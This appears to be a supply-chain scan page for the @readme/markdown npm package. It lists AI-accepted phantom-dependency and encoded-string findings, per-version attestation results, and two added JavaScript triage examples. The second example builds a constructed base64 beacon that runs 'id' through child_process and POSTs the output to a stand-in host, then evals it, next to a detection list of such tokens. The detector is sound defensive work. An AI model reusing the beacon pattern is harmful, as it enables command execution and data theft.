@readme/markdown
ReadMe's React-based Markdown parser
Supply chain provenance
Status for the latest visible version.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| phantom-deps | phantom-dep:estree-util-build-jsx | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:mdast-util-mdxjs-esm | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdxjs-esm | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| source-diff | encoded-string-file:dist/main.js | AI (source-diff): Encoded string is htmlparser2/entities decode trie (base64-packed HTML entity data), not obfuscated malware. | ai | |
| source-diff | encoded-string-file:dist/main.node.js | AI (source-diff): Same htmlparser2/entities decode trie pattern in node bundle; benign data encoding. | ai | |
| phantom-deps | phantom-dep:htmlparser2 | AI (phantom-deps): Bundled into dist via webpack; not directly imported in source but legitimately used. | ai | |
| phantom-deps | phantom-dep:estree-util-to-js | AI (phantom-deps): Bundled dep; phantom-dep is a false positive for this webpack-bundled package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdxjs | AI (phantom-deps): Config-driven plugin loading; stable pattern for this markdown processor. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): New deps are legitimate unified/micromark ecosystem packages matching the package's MDX parsing purpose. | ai | |
| dependencies | unvetted-dep:rehype-react | AI (dependencies): Well-known unified/rehype ecosystem package; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:@readme/syntax-highlighter | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:@readme/emojis | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:@readme/variable | AI (dependencies): Same org (@readme) as this package; expected internal dependency. | ai | |
| dependencies | unvetted-dep:xast-util-to-xml | AI (dependencies): Well-known unified ecosystem utility; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:unist-util-flatmap | AI (dependencies): Well-known unified ecosystem utility; stable dependency for this markdown parser. | ai | |
| dependencies | unvetted-dep:react-native-known-styling-properties | AI (dependencies): Used for CSS property validation in the markdown renderer; benign data package. | ai | |
| phantom-deps | phantom-dep:postcss-prefix-selector | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:react-html-attributes | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-symbol | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-phrasing | AI (phantom-deps): Stable false positive; bundled package with many transitive deps not directly imported at top level. | ai | |
| phantom-deps | phantom-dep:hast-util-from-html | AI (phantom-deps): Declared in package.json as a runtime dep; phantom-dep heuristic false positive for this bundled package. | ai | |
| phantom-deps | phantom-dep:estree-util-value-to-estree | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-mdx-expression | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:unist-util-visit-parents | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-find-and-replace | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:mdast-util-gfm-strikethrough | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-html-tag-name | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-mdx-expression | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-extension-gfm-strikethrough | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:micromark-util-character | AI (phantom-deps): Stable false positive for this bundled markdown package. | ai | |
| phantom-deps | phantom-dep:hast-util-sanitize | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:html-tags | AI (phantom-deps): Large bundled markdown package; many deps used indirectly via webpack bundle, not direct imports. | ai | |
| phantom-deps | phantom-dep:hastscript | AI (phantom-deps): Same as above — bundled dependency pattern for this package. | ai | |
| phantom-deps | phantom-dep:rehype-raw | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-mdx | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:tailwindcss | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-parse | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-parse | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:lodash.escape | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-remark | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-breaks | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-rehype | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:github-slugger | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:mdast-util-gfm | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:path-browserify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-sanitize | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:lodash.kebabcase | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:rehype-stringify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:remark-stringify | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:unist-util-visit | AI (phantom-deps): Bundled dependency pattern. | ai | |
| phantom-deps | phantom-dep:debug | AI (phantom-deps): Large bundled package; deps consumed transitively or via config, not direct imports. | ai | |
| phantom-deps | phantom-dep:react-native-known-styling-properties | AI (phantom-deps): Platform-specific dep used in bundle; stable false positive. | ai | |
| phantom-deps | phantom-dep:unist-util-flatmap | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:xast-util-to-xml | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:@readme/variable | AI (phantom-deps): Same-org dep; consumed via bundle, stable false positive. | ai | |
| phantom-deps | phantom-dep:@readme/emojis | AI (phantom-deps): Same-org dep; consumed via bundle, stable false positive. | ai | |
| phantom-deps | phantom-dep:rehype-react | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:deepmerge | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:entities | AI (phantom-deps): Transitive/bundled dep pattern for this package. | ai | |
| phantom-deps | phantom-dep:process | AI (phantom-deps): Webpack polyfill; referenced in webpack config, not direct import. | ai | |
| phantom-deps | phantom-dep:remark | AI (phantom-deps): Same as above — bundled markdown library pattern. | ai | |
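Most of the accepted findings above are phantom-dep rules, and the accepted reason is the same each time: the dependency is declared in package.json, is never imported by the package's own source, but is consumed inside the webpack bundle under dist/. Below is an added example (not code from @readme/markdown or from the scanner that produced this page) of how to reproduce that finding and triage it yourself: list declared runtime deps that no source file imports, then look for each one in the bundle before accepting the finding as a false positive. Assumptions: the package.json, source files and bundle excerpt are constructed stand-ins, and the bundle keeps webpack's original module paths (a non-minified build); a minified production bundle needs its source map instead.

```javascript
// Added example, not part of @readme/markdown: triage "phantom-dep" findings.
// A phantom dep is declared under "dependencies" in package.json but never
// imported by the package's own source files. For a webpack-bundled package
// that is often a false positive (the dep is consumed inside dist/), so the
// check below looks for the dep in the bundle before accepting the finding.

// Matches the module specifier in `import x from 'y'`, `require('y')`, `import('y')`.
const IMPORT_RE = /(?:\bfrom\s*|\brequire\s*\(\s*|\bimport\s*\(\s*)['"]([^'"]+)['"]/g;

// Reduce a specifier to its package name: "@scope/name/sub" -> "@scope/name",
// "name/sub" -> "name". Relative and absolute paths are not packages.
function packageName(specifier) {
  if (specifier.startsWith('.') || specifier.startsWith('/')) return null;
  const parts = specifier.split('/');
  return specifier.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
}

// Set of package names imported anywhere in the given { path: sourceText } map.
function importedPackages(sourceFiles) {
  const seen = new Set();
  for (const text of Object.values(sourceFiles)) {
    for (const m of text.matchAll(IMPORT_RE)) {
      const name = packageName(m[1]);
      if (name) seen.add(name);
    }
  }
  return seen;
}

// Declared runtime dependencies that no source file imports (the scanner's "phantom-dep").
function phantomDeps(pkg, sourceFiles) {
  const imported = importedPackages(sourceFiles);
  return Object.keys(pkg.dependencies || {}).filter((dep) => !imported.has(dep));
}

// webpack keeps the original module path (e.g. "./node_modules/htmlparser2/lib/index.js")
// as the module key in non-minified builds. Assumption: the bundle under review was
// built that way; for a minified bundle, run this against the source map's sources list.
function appearsInBundle(dep, bundleText) {
  return bundleText.includes(`node_modules/${dep}/`);
}

// Map each phantom dep to a verdict.
function triagePhantoms(pkg, sourceFiles, bundleText) {
  const verdicts = {};
  for (const dep of phantomDeps(pkg, sourceFiles)) {
    verdicts[dep] = appearsInBundle(dep, bundleText)
      ? 'bundled' // present in dist/: the declared dep is used, finding is a false positive
      : 'investigate'; // absent from dist/ too: unused, or loaded by name at runtime
  }
  return verdicts;
}

// Constructed sample inputs (not the real package contents).
const SAMPLE_PKG = {
  name: 'sample-markdown',
  dependencies: { react: '^18', 'remark-parse': '^11', htmlparser2: '^9', '@scope/emojis': '^1', debug: '^4' },
};
const SAMPLE_SOURCE = {
  'src/index.js':
    "import React from 'react';\nimport parse from 'remark-parse/lib/index.js';\nimport './lib/util';",
};
const SAMPLE_BUNDLE = [
  '/***/ "./node_modules/htmlparser2/lib/index.js":',
  '/***/ "./node_modules/@scope/emojis/index.js":',
  '/***/ "./src/index.js":',
].join('\n');

function demo() {
  return triagePhantoms(SAMPLE_PKG, SAMPLE_SOURCE, SAMPLE_BUNDLE);
}
```

With the constructed inputs, htmlparser2 and @scope/emojis come back as bundled (the same verdict the table above records for htmlparser2 and the @readme/* deps), while debug comes back as investigate because nothing in source or bundle references it. That second verdict is the one worth a human look: the table accepts debug as "consumed transitively or via config", which this check cannot confirm.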
Versions (showing 28 of 28)
| Version | Deps | Published |
|---|---|---|
| 14.7.1 | 64 / 64 | |
| 14.7.0 | 64 / 64 | |
| 14.6.0 | 64 / 64 | |
| 14.5.0 | 64 / 64 | |
| 14.4.1 | 64 / 64 | |
| 14.4.0 | 64 / 64 | |
| 14.3.0 | 64 / 64 | |
| 14.2.6 | 60 / 64 | |
| 14.2.5 | 60 / 64 | |
| 14.2.4 | 59 / 64 | |
| 14.2.3 | 59 / 64 | |
| 14.2.2 | 59 / 64 | |
| 14.2.1 | 59 / 64 | |
| 14.2.0 | 57 / 64 | |
| 14.1.4 | 57 / 64 | |
| 14.1.3 | 57 / 64 | |
| 14.1.2 | 57 / 64 | |
| 14.1.1 | 57 / 64 | |
| 14.1.0 | 57 / 64 | |
| 14.0.0 | 57 / 64 | |
| 13.8.5 | 57 / 64 | |
| 13.8.4 | 57 / 64 | |
| 13.8.3 | 57 / 64 | |
| 13.8.2 | 57 / 64 | |
| 13.8.1 | 57 / 64 | |
| 13.8.0 | 57 / 64 | |
| 13.7.4 | 57 / 64 | |
| 13.7.3 | 57 / 64 | |
v14.7.1
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.7.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.6.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.5.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.4.1
3 findings:
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.4.0
3 findings:
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.3.0
3 findings:
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.6
3 findings:
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.5
3 findings:
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Modified file contains 1 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
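The "long encoded string" findings on v14.2.5 through v14.4.1 were accepted in the table above as the base64-packed entity decode trie that htmlparser2/entities ships in dist/main.js and dist/main.node.js. An added example (not code from the page, the scanner, or @readme/markdown) of the check behind that decision: find every quoted literal of 200 or more base64 characters in a bundle, decode it, and tell a packed data table (mostly non-printable bytes) apart from base64-wrapped code (printable text full of require/eval/child_process). The sample bundle, the packed table and the beacon snippet inside it are constructed; the 0.9 printable threshold and the token list are this example's own heuristics.

```javascript
// Added example, not part of @readme/markdown: triage "long encoded string" findings.
// The scanner flags string literals of 200+ characters that look encoded. Decoding
// them separates packed data tables (such as an entity decode trie) from
// base64-wrapped code that the bundle hands to eval().

// A quoted literal made only of base64 characters, 200+ of them (the scanner's threshold).
const LONG_BASE64_RE = /["'`]([A-Za-z0-9+/]{200,}={0,2})["'`]/g;

// Tokens that rarely occur in packed data but almost always in a dropper.
const CODE_TOKENS = /\b(eval|Function|require|import|fetch|child_process|execSync|process\.env)\b/;

// Fraction of bytes that are printable ASCII or whitespace.
function printableRatio(bytes) {
  if (bytes.length === 0) return 0;
  let printable = 0;
  for (const b of bytes) {
    if ((b >= 0x20 && b <= 0x7e) || b === 0x09 || b === 0x0a || b === 0x0d) printable++;
  }
  return printable / bytes.length;
}

// Decode one literal and say what it is: 'binary' (packed table, many non-printable
// bytes), 'code' (printable text with code-like tokens) or 'text' (printable, no tokens).
function classify(b64) {
  const bytes = Buffer.from(b64, 'base64');
  const ratio = printableRatio(bytes);
  if (ratio < 0.9) return { verdict: 'binary', ratio };
  const text = bytes.toString('utf8');
  return { verdict: CODE_TOKENS.test(text) ? 'code' : 'text', ratio };
}

// Scan a bundle's source text and report every long encoded literal with its verdict.
function scanBundle(source) {
  const findings = [];
  for (const m of source.matchAll(LONG_BASE64_RE)) {
    findings.push({ offset: m.index, length: m[1].length, ...classify(m[1]) });
  }
  return findings;
}

// Constructed sample bundle. The first literal packs a 256-byte table (a stand-in for a
// decode trie); the second is base64 of a small beacon, the pattern the rule exists for.
const PACKED_TABLE = Buffer.from(Array.from({ length: 256 }, (_, i) => i)).toString('base64');
const BEACON_CODE =
  '/* constructed sample, not live code */ ' +
  'const cp = require("child_process"); const out = cp.execSync("id").toString(); ' +
  'require("https").request({ host: "example.invalid", method: "POST" }).end(out);';
const SAMPLE_BUNDLE =
  `var trie = new Uint8Array(Buffer.from("${PACKED_TABLE}", "base64"));\n` +
  `var b = "${Buffer.from(BEACON_CODE).toString('base64')}";\n` +
  'eval(Buffer.from(b, "base64").toString());\n';

function demo() {
  return scanBundle(SAMPLE_BUNDLE);
}
```

Run against the sample, the packed table decodes to bytes of which only about 38% are printable and is reported as binary, which is the shape the accepted finding above describes; the second literal decodes to clean ASCII containing require and child_process and is reported as code. A real dist/main.js will also contain long literals that are neither (source maps, inlined CSS), so treat the verdict as a sort key for manual review, not a final answer.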
v14.2.4
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.3
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.2
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.1
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.2.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.4
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.3
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.2
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.1
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.1.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v14.0.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.5
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.4
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.3
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.2
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.1
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.8.0
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.7.4
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v13.7.3
1 finding:
Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.